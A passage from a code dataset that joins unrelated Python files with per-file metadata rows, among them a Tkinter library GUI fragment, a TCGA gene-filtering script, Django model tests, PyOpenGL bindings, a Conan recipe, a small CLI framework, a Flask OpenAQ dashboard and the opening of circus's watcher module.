user = Checkbutton(root, font=12, text="Пользователь", fg='black', variable=var1)
user.place(relx=0.011, rely=0.72, relwidth=0.1, relheight=0.05)
lib_worker = Checkbutton(root, font=12, text="Библиотекарь", fg='black', variable=var2)
lib_worker.place(relx=0.01, rely=0.76, relwidth=0.1, relheight=0.05)
admin = Checkbutton(root, font=12, text="Админ", fg='black', variable=var3)
admin.place(relx=0.0195, rely=0.8, relwidth=0.05, relheight=0.05)
fill_LibTable()
# endregion
if __name__ == "__main__":
root.mainloop()
| 44.193416
| 122
| 0.648524
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 4,608
| 0.202585
|
8be8ad1bff74a971fe98e6113f758f85c95026e6
| 621
|
py
|
Python
|
utilities.py
|
tsilifis/BayesEmbed-mfGP
|
61ee75284bac34084ee4d171257023cc4d60c910
|
[
"MIT"
] | null | null | null |
utilities.py
|
tsilifis/BayesEmbed-mfGP
|
61ee75284bac34084ee4d171257023cc4d60c910
|
[
"MIT"
] | null | null | null |
utilities.py
|
tsilifis/BayesEmbed-mfGP
|
61ee75284bac34084ee4d171257023cc4d60c910
|
[
"MIT"
] | null | null | null |
from datetime import datetime
import numpy as np
def add_basis_element(W):
"""
Given a D x d orthonormal matrix W (with d << D), it computes a new vector v that
is orthogonal to all d columns of W and add it as an additional column.
Return : D x (d+1) orthonormal matrix [W v]
"""
dim = W.shape[1]
d = W.shape[0]
v = np.random.randn(d)
v = v / np.linalg.norm(v)
u = np.zeros(v.shape)
for i in range(dim):
u = u - np.sum(W[:, i] * v) * W[:, i]
v = (v - u).reshape(-1, 1)
v = v / np.linalg.norm(v)
return np.hstack([W, v])
def compact_timestamp():
return '{:%Y%m%d_%H%M%S}'.format(datetime.now())
| 23
| 83
| 0.621578
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 228
| 0.36715
|
8be92b2b82e61183cec9beb6bacf4eefc2f03ab0
| 4,049
|
py
|
Python
|
data/LoadingScripts/adapt_tcga.py
|
Bertinus/causal_cell_embedding
|
417b55749130fc7b7832fd3ee4c49feff4a04593
|
[
"MIT"
] | null | null | null |
data/LoadingScripts/adapt_tcga.py
|
Bertinus/causal_cell_embedding
|
417b55749130fc7b7832fd3ee4c49feff4a04593
|
[
"MIT"
] | null | null | null |
data/LoadingScripts/adapt_tcga.py
|
Bertinus/causal_cell_embedding
|
417b55749130fc7b7832fd3ee4c49feff4a04593
|
[
"MIT"
] | null | null | null |
import numpy as np
import pandas as pd
########################################################################################################################
# Load data
########################################################################################################################
print("Adapt TCGA: Loading data. Might take some time...")
# TCGA gene expression matrix
data = pd.read_csv('Data/Downstream_Tasks/TcgaTargetGtex_rsem_gene_tpm', sep='\t')
# Load Ensembl Id conversion table
conversion_table = pd.read_csv('Data/Downstream_Tasks/ensembl_names.txt', sep='\t')
# Get list of landmark genes
gene_info = pd.read_csv("Data/L1000_PhaseI/GSE92742_Broad_LINCS/GSE92742_Broad_LINCS_gene_info.txt", sep="\t")
########################################################################################################################
# Build conversion map
########################################################################################################################
print("Adapt TCGA: build conversion map")
# Build name to ensembl dictionary
name_to_ensembl_dict = {}
for l in conversion_table.iterrows():
name_to_ensembl_dict[l[1]['Approved symbol']] = l[1]['Ensembl gene ID']
# Manually add landmark genes that are not in the ensembl ID table
not_matched_dict = {"EPRS": "ENSG00000136628",
"AARS": "ENSG00000090861",
"TOMM70A": "ENSG00000154174",
"KIAA0196": "ENSG00000164961",
"KIAA0907": "ENSG00000132680",
"PAPD7": "ENSG00000112941",
"IKBKAP": "ENSG00000070061",
"HIST2H2BE": "ENSG00000184678",
"WRB": "ENSG00000182093",
"KIAA0355": "ENSG00000166398",
"TMEM5": "ENSG00000118600",
"HDGFRP3": "ENSG00000166503",
"PRUNE": "ENSG00000143363",
"HIST1H2BK": "ENSG00000197903",
"HN1L": "ENSG00000206053",
"H2AFV": "ENSG00000105968",
"KIF1BP": "ENSG00000198954",
"KIAA1033": "ENSG00000136051",
"FAM69A": "ENSG00000154511",
"TMEM110": "ENSG00000213533",
"ATP5S": "ENSG00000125375",
"SQRDL": "ENSG00000137767",
"TMEM2": "ENSG00000135048",
"ADCK3": "ENSG00000163050",
"NARFL": "ENSG00000103245",
"FAM57A": "ENSG00000167695",
"LRRC16A": "ENSG00000079691",
"FAM63A": "ENSG00000143409",
"TSTA3": "ENSG00000104522"}
name_to_ensembl_dict = {**name_to_ensembl_dict, **not_matched_dict}
landmark_ensembl_dict = {name: name_to_ensembl_dict[name]
for name in gene_info[gene_info['pr_is_lm'] == 1]['pr_gene_symbol']}
landmark_ensembl_to_name_dict = {landmark_ensembl_dict[name]: name for name in landmark_ensembl_dict.keys()}
########################################################################################################################
# Retrieve part of TCGA matrix that corresponds to landmark genes
########################################################################################################################
print("Adapt TCGA: modify TCGA matrix")
# Remove version of the ensembl ID in TCGA data
data['ensembl'] = data['sample'].apply(lambda s: s.split('.')[0])
# Restrict to landmark genes
data_lamdmark_genes = data[data['ensembl'].apply(lambda s: s in landmark_ensembl_dict.values())]
data_lamdmark_genes = data_lamdmark_genes.drop(['sample'], axis=1)
# Add gene names to the matrix
data_lamdmark_genes['name'] = data_lamdmark_genes['ensembl'].apply(lambda s: landmark_ensembl_to_name_dict[s])
data_lamdmark_genes = data_lamdmark_genes.set_index('name')
data_lamdmark_genes = data_lamdmark_genes.drop(['ensembl'], axis=1)
# Save
data_lamdmark_genes.to_csv("Data/Downstream_Tasks/tcga_landmark_genes.csv")
| 46.011364
| 120
| 0.514942
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,316
| 0.571993
|
8bea72f709ee92f0256045645314ed84137d7a0e
| 6,924
|
py
|
Python
|
tests/test_share_resource/test_master_data.py
|
anhlt59/django_refactor
|
1b1d86af9f732a000e30feb7644f6ca60b6e516a
|
[
"MIT"
] | null | null | null |
tests/test_share_resource/test_master_data.py
|
anhlt59/django_refactor
|
1b1d86af9f732a000e30feb7644f6ca60b6e516a
|
[
"MIT"
] | null | null | null |
tests/test_share_resource/test_master_data.py
|
anhlt59/django_refactor
|
1b1d86af9f732a000e30feb7644f6ca60b6e516a
|
[
"MIT"
] | null | null | null |
import pytest
from app.share_resources.master_data.models import *
# test company_type_category
@pytest.mark.django_db
class TestCompanyTypeCategory:
def test_create(self, create_company_type_category):
assert CompanyTypeCategory.objects.count() == 1
def test_update(self, create_company_type_category):
category = create_company_type_category
category.name = "category name update"
category.save()
category_test = CompanyTypeCategory.objects.get(id=category.id)
assert category_test.name == "category name update"
def test_delete(self, create_company_type_category):
assert CompanyTypeCategory.objects.count() == 1
CompanyTypeCategory.objects.get(id=create_company_type_category.id).delete()
assert CompanyTypeCategory.objects.count() == 0
# test company_type_master
@pytest.mark.django_db
class TestCompanyTypeMaster:
def test_create(self, create_company_type_master):
assert CompanyTypeMaster.objects.count() == 1
def test_update(self, create_company_type_master):
company_type = create_company_type_master
company_type.name = "company type update"
company_type.save()
company_type_test = CompanyTypeMaster.objects.get(id=company_type.id)
assert company_type_test.name == "company type update"
def test_delete(self, create_company_type_master):
assert CompanyTypeMaster.objects.count() == 1
create_company_type_master.delete()
assert CompanyTypeMaster.objects.count() == 0
# test work_place_category
@pytest.mark.django_db
class TestWorkPlaceCategory:
def test_create(self, create_work_place_category):
assert WorkPlaceCategory.objects.count() == 1
def test_update(self, create_work_place_category):
work_place_category = create_work_place_category
work_place_category.name = "work place category name update"
work_place_category.save()
work_place_category_test = WorkPlaceCategory.objects.get(id=create_work_place_category.id)
assert work_place_category_test.name == "work place category name update"
def test_delete(self, create_work_place_category):
assert WorkPlaceCategory.objects.count() == 1
WorkPlaceCategory.objects.get(id=create_work_place_category.id).delete()
assert WorkPlaceCategory.objects.count() == 0
# test work_place_master
@pytest.mark.django_db
class TestWorkPlaceMaster:
def test_create(self, create_work_place_master):
assert WorkPlaceMaster.objects.count() == 1
def test_update(self, create_work_place_master):
work_place = create_work_place_master
work_place.name = "work place name"
work_place.save()
work_place_test = WorkPlaceMaster.objects.get(id=work_place.id)
assert work_place_test.name == "work place name"
def test_delete(self, create_work_place_master):
assert WorkPlaceMaster.objects.count() == 1
create_work_place_master.delete()
assert WorkPlaceMaster.objects.count() == 0
# test job_type_category
@pytest.mark.django_db
class TestJobTypeCategory:
def test_create(self, create_job_type_category):
assert JobTypeCategory.objects.count() == 1
def test_update(self, create_job_type_category):
job_type = create_job_type_category
job_type.name = "job name update"
job_type.save()
job_type_test = JobTypeCategory.objects.get(id=job_type.id)
assert job_type_test.name == "job name update"
def test_delete(self, create_job_type_category):
assert JobTypeCategory.objects.count() == 1
create_job_type_category.delete()
assert JobTypeCategory.objects.count() == 0
# test job_type_master
@pytest.mark.django_db
class TestJobTypeMaster:
def test_create(self, create_job_type_master):
assert JobTypeMaster.objects.count() == 1
def test_update(self, create_job_type_master):
job_type = create_job_type_master
job_type.name = "job type update"
job_type.save()
job_type_test = JobTypeMaster.objects.get(id=job_type.id)
assert job_type_test.name == "job type update"
def test_delete(self, create_job_type_master):
assert JobTypeMaster.objects.count() == 1
create_job_type_master.delete()
assert JobTypeMaster.objects.count() == 0
# test school_info_master
@pytest.mark.django_db
class TestSchoolInfoMaster:
def test_create(self, create_school_info_master):
assert SchoolInfoMaster.objects.count() == 1
def test_update(self, create_school_info_master):
school_info = create_school_info_master
school_info.name = "name update"
school_info.save()
school_info_test = SchoolInfoMaster.objects.get(id=school_info.id)
assert school_info_test.name == "name update"
def test_delete(self, create_school_info_master):
assert SchoolInfoMaster.objects.count() == 1
create_school_info_master.delete()
assert SchoolInfoMaster.objects.count() == 0
# test media
@pytest.mark.django_db
class TestMedia:
def test_create(self, create_media):
assert Media.objects.count() == 1
def test_update(self, create_media):
media = create_media
media.name = "name update"
media.save()
media_update = Media.objects.get(id=media.id)
assert media_update.name == "name update"
def test_delete(self, create_media):
assert Media.objects.count() == 1
create_media.delete()
assert Media.objects.count() == 0
# test Plan
@pytest.mark.django_db
class TestPlan:
def test_create(self, create_plan):
assert Plan.objects.count() == 1
def test_update(self, create_plan):
plan = create_plan
plan.name = "name update"
plan.save()
plan_test = Plan.objects.get(id=plan.id)
assert plan_test.name == "name update"
def test_delete(self, create_plan):
assert Plan.objects.count() == 1
create_plan.delete()
assert Plan.objects.count() == 0
# test type_auto_reply_message
@pytest.mark.django_db
class TestTypeAutoReplyMessage:
def test_create(self, create_type_auto_reply_message):
assert TypeAutoReplyMessage.objects.count() == 1
def test_update(self, create_type_auto_reply_message):
type_auto_reply_message = create_type_auto_reply_message
type_auto_reply_message.name = "type update"
type_auto_reply_message.save()
type_auto_reply_message_test = TypeAutoReplyMessage.objects.get(id=type_auto_reply_message.id)
assert type_auto_reply_message_test.name == "type update"
def test_delete(self, create_type_auto_reply_message):
assert TypeAutoReplyMessage.objects.count() == 1
create_type_auto_reply_message.delete()
assert TypeAutoReplyMessage.objects.count() == 0
| 33.941176
| 102
| 0.718515
| 6,358
| 0.918255
| 0
| 0
| 6,588
| 0.951473
| 0
| 0
| 586
| 0.084633
|
8bec7a78ef815c669108337b9955421ae8412b87
| 1,192
|
py
|
Python
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/ARB/get_program_binary.py
|
ShujaKhalid/deep-rl
|
99c6ba6c3095d1bfdab81bd01395ced96bddd611
|
[
"MIT"
] | 210
|
2016-04-09T14:26:00.000Z
|
2022-03-25T18:36:19.000Z
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/ARB/get_program_binary.py
|
ShujaKhalid/deep-rl
|
99c6ba6c3095d1bfdab81bd01395ced96bddd611
|
[
"MIT"
] | 72
|
2016-09-04T09:30:19.000Z
|
2022-03-27T17:06:53.000Z
|
deep-rl/lib/python2.7/site-packages/OpenGL/raw/GL/ARB/get_program_binary.py
|
ShujaKhalid/deep-rl
|
99c6ba6c3095d1bfdab81bd01395ced96bddd611
|
[
"MIT"
] | 64
|
2016-04-09T14:26:49.000Z
|
2022-03-21T11:19:47.000Z
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GL import _types as _cs
# End users want this...
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_get_program_binary'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_get_program_binary',error_checker=_errors._error_checker)
GL_NUM_PROGRAM_BINARY_FORMATS=_C('GL_NUM_PROGRAM_BINARY_FORMATS',0x87FE)
GL_PROGRAM_BINARY_FORMATS=_C('GL_PROGRAM_BINARY_FORMATS',0x87FF)
GL_PROGRAM_BINARY_LENGTH=_C('GL_PROGRAM_BINARY_LENGTH',0x8741)
GL_PROGRAM_BINARY_RETRIEVABLE_HINT=_C('GL_PROGRAM_BINARY_RETRIEVABLE_HINT',0x8257)
@_f
@_p.types(None,_cs.GLuint,_cs.GLsizei,arrays.GLsizeiArray,arrays.GLuintArray,ctypes.c_void_p)
def glGetProgramBinary(program,bufSize,length,binaryFormat,binary):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLenum,ctypes.c_void_p,_cs.GLsizei)
def glProgramBinary(program,binaryFormat,binary,length):pass
@_f
@_p.types(None,_cs.GLuint,_cs.GLenum,_cs.GLint)
def glProgramParameteri(program,pname,value):pass
| 44.148148
| 119
| 0.833054
| 0
| 0
| 0
| 0
| 400
| 0.33557
| 0
| 0
| 281
| 0.235738
|
4733f343c64441b45c6474b08ce6fa31a64e3fde
| 176
|
py
|
Python
|
hazm/utils.py
|
perryyo/hazm
|
8596ea060f0c241eba7dece3ad1db6baa36439ed
|
[
"MIT"
] | null | null | null |
hazm/utils.py
|
perryyo/hazm
|
8596ea060f0c241eba7dece3ad1db6baa36439ed
|
[
"MIT"
] | null | null | null |
hazm/utils.py
|
perryyo/hazm
|
8596ea060f0c241eba7dece3ad1db6baa36439ed
|
[
"MIT"
] | 1
|
2018-12-09T05:16:06.000Z
|
2018-12-09T05:16:06.000Z
|
from os import path
data_path = path.join(path.dirname(__file__), 'data')
default_words = path.join(data_path, 'words.dat')
default_verbs = path.join(data_path, 'verbs.dat')
| 25.142857
| 53
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 28
| 0.159091
|
4735a6be395ffd4914453c63b7dd438db0593092
| 629
|
py
|
Python
|
parseridge/parser/training/callbacks/save_model_callback.py
|
jgontrum/parseridge
|
f87ef82a9468addeb09a91c3b5310db38840bf0f
|
[
"Apache-2.0"
] | 6
|
2019-10-06T23:00:29.000Z
|
2020-04-08T02:04:24.000Z
|
parseridge/parser/training/callbacks/save_model_callback.py
|
jgontrum/parseridge
|
f87ef82a9468addeb09a91c3b5310db38840bf0f
|
[
"Apache-2.0"
] | 2
|
2020-04-28T12:06:23.000Z
|
2020-04-28T13:30:03.000Z
|
parseridge/parser/training/callbacks/save_model_callback.py
|
jgontrum/parseridge
|
f87ef82a9468addeb09a91c3b5310db38840bf0f
|
[
"Apache-2.0"
] | 1
|
2019-12-23T00:53:38.000Z
|
2019-12-23T00:53:38.000Z
|
import os
from typing import Any, Optional
import torch
from parseridge.parser.modules.data_parallel import Module
from parseridge.parser.training.callbacks.base_callback import Callback
class SaveModelCallback(Callback):
_order = 5
def __init__(self, folder_path: Optional[str] = None):
self.folder = folder_path
if self.folder:
os.makedirs(folder_path, exist_ok=True)
def on_epoch_end(self, epoch: int, model: Module, **kwargs: Any) -> None:
if self.folder:
file_name = f"{self.folder}/epoch_{epoch}.torch"
torch.save(model.state_dict(), file_name)
| 28.590909
| 77
| 0.696343
| 437
| 0.694754
| 0
| 0
| 0
| 0
| 0
| 0
| 36
| 0.057234
|
4735d1f5a8954c473193826a0ee08dd64ab9a93e
| 35
|
py
|
Python
|
Training/pylens/__init__.py
|
Annarien/GravitationalLenses
|
c2606aacc62d2534fb199f5228dc21c0ea604251
|
[
"MIT"
] | null | null | null |
Training/pylens/__init__.py
|
Annarien/GravitationalLenses
|
c2606aacc62d2534fb199f5228dc21c0ea604251
|
[
"MIT"
] | null | null | null |
Training/pylens/__init__.py
|
Annarien/GravitationalLenses
|
c2606aacc62d2534fb199f5228dc21c0ea604251
|
[
"MIT"
] | null | null | null |
import massmodel,pylens,MassModels
| 17.5
| 34
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
473611358315db91be2c68a0523fa1b4712e6722
| 1,083
|
py
|
Python
|
conanfile.py
|
martinmoene/lest-conan-package
|
db0a1eda840e819edb0c1bb5dc4d8384d1a92c19
|
[
"MIT"
] | null | null | null |
conanfile.py
|
martinmoene/lest-conan-package
|
db0a1eda840e819edb0c1bb5dc4d8384d1a92c19
|
[
"MIT"
] | null | null | null |
conanfile.py
|
martinmoene/lest-conan-package
|
db0a1eda840e819edb0c1bb5dc4d8384d1a92c19
|
[
"MIT"
] | null | null | null |
from contextlib import closing
from tarfile import open as taropen
from urllib2 import urlopen
from conans import ConanFile
class lestConan(ConanFile):
name = "lest"
version = "1.26.0"
url = "https://github.com/martinmoene/lest-conan-package"
license = "Boost 1.0"
author = "Martin Moene (martin.moene@gmail.com)"
settings = None # header-only
def build(self):
None #empty too, nothing to build in header only
def source(self):
url = "https://github.com/martinmoene/lest/archive/v{0}.tar.gz".format(self.version)
with closing(urlopen(url)) as dl:
with taropen(mode='r|gz', fileobj=dl) as archive:
archive.extractall()
def package(self):
self.copy(pattern="*.hpp", dst="include/lest", src="lest-{0}/include/lest".format(self.version))
# self.copy(pattern="*.hpp", dst="include/lest", src="lest-{0}".format(self.version))
def package_info(self):
self.cpp_info.includedirs = ['include/lest']
self.cpp_info.libdirs = []
self.cpp_info.resdirs = []
| 32.818182
| 104
| 0.644506
| 955
| 0.88181
| 0
| 0
| 0
| 0
| 0
| 0
| 377
| 0.348107
|
47364a3924f1597cca49227e92174ee485e954ae
| 555
|
py
|
Python
|
erp/migrations/0093_auto_20200922_0802.py
|
Foohx/acceslibre
|
55135e096f2ec4e413ff991f01c17f5e0d5925c0
|
[
"MIT"
] | 8
|
2020-07-23T08:17:28.000Z
|
2022-03-09T22:31:36.000Z
|
erp/migrations/0093_auto_20200922_0802.py
|
Foohx/acceslibre
|
55135e096f2ec4e413ff991f01c17f5e0d5925c0
|
[
"MIT"
] | 37
|
2020-07-01T08:47:33.000Z
|
2022-02-03T19:50:58.000Z
|
erp/migrations/0093_auto_20200922_0802.py
|
Foohx/acceslibre
|
55135e096f2ec4e413ff991f01c17f5e0d5925c0
|
[
"MIT"
] | 4
|
2021-04-08T10:57:18.000Z
|
2022-01-31T13:16:31.000Z
|
# Generated by Django 3.1.1 on 2020-09-22 06:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('erp', '0092_merge_20200916_1733'),
]
operations = [
migrations.AlterField(
model_name='accessibilite',
name='cheminement_ext_reperage_marches',
field=models.BooleanField(blank=True, choices=[(True, 'Oui'), (False, 'Non'), (None, 'Inconnu ou sans objet')], null=True, verbose_name='Repérage des marches ou de l’escalier'),
),
]
| 29.210526
| 189
| 0.641441
| 465
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 202
| 0.362007
|
4738887a5abd7d5e02db7c0d3385f50ba3f81899
| 8,290
|
py
|
Python
|
cli/cli.py
|
MustafaTheCoder/create-a-cli-tool
|
9f7c327927e22b390a58c8c8b599a59cad246f2e
|
[
"MIT"
] | 3
|
2021-09-27T10:35:24.000Z
|
2021-10-02T08:16:46.000Z
|
cli/cli.py
|
MustafaTheCoder/create-a-cli-tool
|
9f7c327927e22b390a58c8c8b599a59cad246f2e
|
[
"MIT"
] | 1
|
2021-09-22T15:44:30.000Z
|
2021-09-22T15:44:30.000Z
|
cli/cli.py
|
MustafaTheCoder/create-a-cli-tool
|
9f7c327927e22b390a58c8c8b599a59cad246f2e
|
[
"MIT"
] | 3
|
2021-09-21T05:19:42.000Z
|
2021-10-02T08:16:48.000Z
|
import asyncio
import sys
from typing import Any, Callable, List, Optional, Union
from .commands import Command
from .commands import CommandGroup as Group
from .errors import *
class CLI:
"""
The CLI class it self, this will represent your cli.
Parameters
-----------
name: :class:`str`
The name of your CLI
no_welcome_message: :class:`bool`
Choose if you want to display a welcome message or not.
command_not_found_message: :class:`str`
Pick whatever error message you want to print out when a command is not found.
"""
def __init__(
self,
name: str,
no_welcome_message: bool = False,
command_not_found_message: str = "Command not found.",
) -> None:
self.name: str = str(name)
self.commands: List[Command] = [
Command(
name="help",
func=self.show_help,
description="Shows this message.",
)
]
self.no_welcome_message: bool = no_welcome_message
self.command_not_found_message: str = command_not_found_message
def command(
self,
name: Optional[str] = None,
description: Optional[str] = None,
aliases: List[Optional[Command]] = [],
) -> Callable[..., Any,]:
"""
Make a command for your cli.
Parameters
-----------
name: :class:`str`
The name of the command, Default to the name of your function.
description: :class:`str`
The description of the command, Defaults to the function's doc.
aliases: :class:`List[str]`
A list of strings that contains the name of the aliases you want.
"""
def decorator(
func: Callable[
...,
Any,
]
) -> Command:
if asyncio.iscoroutinefunction(func):
raise NoCorountines("Functions must not be coroutines.")
if not name:
cmd: Command = Command.from_function(func)
else:
cmd: Command = Command(name=name, func=func, description=description) # type: ignore
if cmd.name.count(" ") > 0:
raise NameHasSpaces("Command cannot have spaces.")
if cmd in self.commands:
raise CommandAlreadyExists(f"The command named {cmd.name} already exists.")
self.commands.append(cmd)
if aliases:
for alias in aliases:
self.commands.append(
Command(
name=alias,
func=func,
description=description,
)
)
return cmd
return decorator
def group(
self,
name: Optional[str] = None,
description: Optional[str] = None,
aliases: List[Optional[Group]] = [],
) -> Callable[..., Any,]:
"""
Make a command group for your cli.
Parameters
-----------
name: :class:`str`
The name of the group, Default to the name of your function.
description: :class:`str`
The description of the group, Defaults to the function's doc.
aliases: :class:`List[str]`
A list of strings that contains the name of the aliases you want.
"""
def decorator(
func: Callable[
...,
Any,
]
) -> Group:
if asyncio.iscoroutinefunction(func):
raise RuntimeError("Functions must not be coroutines.")
if not name:
cmd: Group = Group.from_function(func)
else:
cmd: Group = Group(name=name, func=func, description=description) # type: ignore
if cmd.name.count(" ") > 0:
raise NameHasSpaces("Command cannot have spaces.")
if cmd in self.commands:
raise CommandAlreadyExists(f"The group named {cmd.name} already exists.")
self.commands.append(cmd)
if aliases:
for alias in aliases:
self.commands.append(
Group(
name=alias,
func=func,
description=description,
)
)
return cmd
return decorator
def run(
self,
interactive: bool = True,
) -> None:
"""
Run your cli.
Parameters
-----------
interactive: :class:`bool`
Pick if the cli should be interactive or not, if set to false you will do like ``python3 main.py command_name``.
"""
if interactive:
if not self.no_welcome_message:
print("Welcome to " + self.name)
args: List[str] = input(">>> ").split()
while args and args[0] not in (
"exit",
"quit",
):
cmd = self.get_command(args[0])
if not cmd:
print(self.command_not_found_message)
args = input(">>> ").split()
elif type(cmd) == Command:
print(type(cmd))
try:
cmd._func(*args[1:])
except TypeError as e:
cmd._func()
args: List[str] = input(">>> ").split() # type: ignore
elif type(cmd) == Group:
for subcmd in cmd.children: # type: ignore
if subcmd.name == args[0]:
try:
subcmd._func(*args[2:])
except TypeError as e:
print(e)
args: List[str] = input(">>> ").split() # type: ignore
else:
try:
cmd._func(*args[1:])
except TypeError:
cmd._func()
args: List[str] = input(">>> ").split() # type: ignore
else:
cmd = self.get_command(sys.argv[1]) # type: ignore
if not cmd:
print(self.command_not_found_message)
return
if type(cmd) == Command:
try:
cmd._func(*sys.argv[2:])
except TypeError:
cmd._func()
else:
for subcmd in cmd: # type: ignore
if subcmd.name == sys.argv[2]:
try:
subcmd._func(*sys.argv[2:])
except TypeError:
subcmd._func()
break
else:
try:
cmd._func(*sys.argv[1:])
except TypeError:
cmd._func()
def get_command(self, name: str) -> Union[Group, Command]: # type: ignore
for command in self.commands:
if command.name == name:
return command # type: ignore
def remove_command(
self,
name: str,
) -> None:
"""
Remove a command.
Parameters
-----------
name: :class:`str`
The name of the command that you want to remove.
"""
for cmd in self.commands:
if cmd.name == name:
self.commands.remove(cmd)
break
def show_help(
self,
) -> None:
for cmd in self.commands:
print(f"{cmd.name} - {cmd.description}")
def add_shard(
self,
shard,
):
"""
Add a shard to the cli.
Parameters
-----------
shard: :class:`cli.cli.ext.shard.Shard`
The shard you want to add
"""
shard = shard
_shard_cmds = shard._inject()
for cmd in _shard_cmds:
self.commands.append(cmd)
| 30.932836
| 124
| 0.458987
| 8,108
| 0.978046
| 0
| 0
| 0
| 0
| 0
| 0
| 2,305
| 0.278046
|
47391c58cb36718e353c6d24ef9b6c3dc10d34e8
| 230
|
py
|
Python
|
propertiesTemplate/Fields/FieldTester.py
|
HenShalom/tableTransform
|
ede5c9ed3ecb32f74712778a6746b03773ac28ef
|
[
"Apache-2.0"
] | null | null | null |
propertiesTemplate/Fields/FieldTester.py
|
HenShalom/tableTransform
|
ede5c9ed3ecb32f74712778a6746b03773ac28ef
|
[
"Apache-2.0"
] | null | null | null |
propertiesTemplate/Fields/FieldTester.py
|
HenShalom/tableTransform
|
ede5c9ed3ecb32f74712778a6746b03773ac28ef
|
[
"Apache-2.0"
] | 2
|
2019-11-20T02:47:23.000Z
|
2019-11-20T02:47:23.000Z
|
from propertiesTemplate.Fields.BasicField import BasicField
from propertiesTemplate.Fields.ConstField import ConstField
def get_field(value):
if value[0] == '@':
return BasicField(value)
return ConstField(value)
| 25.555556
| 59
| 0.76087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.013043
|
473931c03e87e8ad7ec18f92b6ba042e2eddadd3
| 494
|
py
|
Python
|
Alice/Sorting/selection_sort.py
|
sandeepm96/cormen-algos
|
9154f6ce9cb0c318bc0d6ecaa13676d080985cec
|
[
"MIT"
] | 1
|
2017-09-15T13:34:19.000Z
|
2017-09-15T13:34:19.000Z
|
Alice/Sorting/selection_sort.py
|
sandeepm96/cormen-algos
|
9154f6ce9cb0c318bc0d6ecaa13676d080985cec
|
[
"MIT"
] | null | null | null |
Alice/Sorting/selection_sort.py
|
sandeepm96/cormen-algos
|
9154f6ce9cb0c318bc0d6ecaa13676d080985cec
|
[
"MIT"
] | null | null | null |
class SelectionSort:
def __init__(self,array):
self.array = array
def result(self):
n = len(self.array)
for i in range(n):
minimum = i
for j in range(i+1,n):
if self.array[minimum] > self.array[j]:
minimum = j
self.array[i],self.array[minimum] = self.array[minimum],self.array[i]
return self.array
test = list(map(int,input().split(' ')))
t = SelectionSort(test)
print(t.result())
| 29.058824
| 81
| 0.544534
| 409
| 0.827935
| 0
| 0
| 0
| 0
| 0
| 0
| 3
| 0.006073
|
4739439933f695399a93b2006266d661c9ac6918
| 1,521
|
py
|
Python
|
sprint/DS-Unit-3-Sprint-3-Productization-and-Cloud/sprint/aq_dashboard.py
|
ndow33/DS-Unit-3-Sprint-3-Productization-and-Cloud
|
17ebfc34991649580fce24dae5c0a7933f5b3095
|
[
"MIT"
] | null | null | null |
sprint/DS-Unit-3-Sprint-3-Productization-and-Cloud/sprint/aq_dashboard.py
|
ndow33/DS-Unit-3-Sprint-3-Productization-and-Cloud
|
17ebfc34991649580fce24dae5c0a7933f5b3095
|
[
"MIT"
] | null | null | null |
sprint/DS-Unit-3-Sprint-3-Productization-and-Cloud/sprint/aq_dashboard.py
|
ndow33/DS-Unit-3-Sprint-3-Productization-and-Cloud
|
17ebfc34991649580fce24dae5c0a7933f5b3095
|
[
"MIT"
] | null | null | null |
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import openaq
import requests
# connects to the api
api = openaq.OpenAQ()
# initialize the app
APP = Flask(__name__)
# configure the database
APP.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite3'
DB = SQLAlchemy(APP)
# define a function that will return a list of date time and value tuples
def tuple_list():
status, body = api.measurements(city='Los Angeles', parameter='pm25')
body_result = body["results"]
test_list = []
counter = 0
for x in body_result:
utc_date = body_result[counter]['date']['utc']
value = body_result[counter]['value']
combo = [utc_date, value]
test_list.append(combo)
counter = counter + 1
return test_list
# Base route
@APP.route('/')
def root():
# uses the function defined above to return a list of tuples as a string
test = tuple_list()
return str(test)
class Record(DB.Model):
id = DB.Column(DB.Integer, primary_key=True)
datetime = DB.Column(DB.String(25))
value = DB.Column(DB.Float, nullable=False)
def __repr__(self):
return 'TODO - write a nice representation of Records'
@APP.route('/refresh')
def refresh():
"""Pull fresh data from Open AQ and replace existing data."""
DB.drop_all()
DB.create_all()
# TODO Get data from OpenAQ, make Record objects with it, and add to db
db_list = tuple_list()
DB.session.commit()
return 'Data refreshed!'
| 27.160714
| 76
| 0.663379
| 254
| 0.166995
| 0
| 0
| 462
| 0.303748
| 0
| 0
| 531
| 0.349112
|
47398e6b8466cbdbb207c2820f76f1b99f1321a9
| 21,273
|
py
|
Python
|
circus/watcher.py
|
j4mie/circus
|
d026b692cc7c4ec57bed7aaa671fce561adc0f3d
|
[
"Apache-2.0"
] | 1
|
2015-11-05T11:44:54.000Z
|
2015-11-05T11:44:54.000Z
|
circus/watcher.py
|
j4mie/circus
|
d026b692cc7c4ec57bed7aaa671fce561adc0f3d
|
[
"Apache-2.0"
] | null | null | null |
circus/watcher.py
|
j4mie/circus
|
d026b692cc7c4ec57bed7aaa671fce561adc0f3d
|
[
"Apache-2.0"
] | null | null | null |
import copy
import errno
import os
import signal
import time
from psutil import STATUS_ZOMBIE, STATUS_DEAD, NoSuchProcess
from zmq.utils.jsonapi import jsonmod as json
from circus.process import Process, DEAD_OR_ZOMBIE, UNEXISTING
from circus import logger
from circus import util
from circus.stream import get_pipe_redirector, get_stream
from circus.util import parse_env
class Watcher(object):
"""
Class managing a list of processes for a given command.
Options:
- **name**: name given to the watcher. Used to uniquely identify it.
- **cmd**: the command to run. May contain *$WID*, which will be
replaced by **wid**.
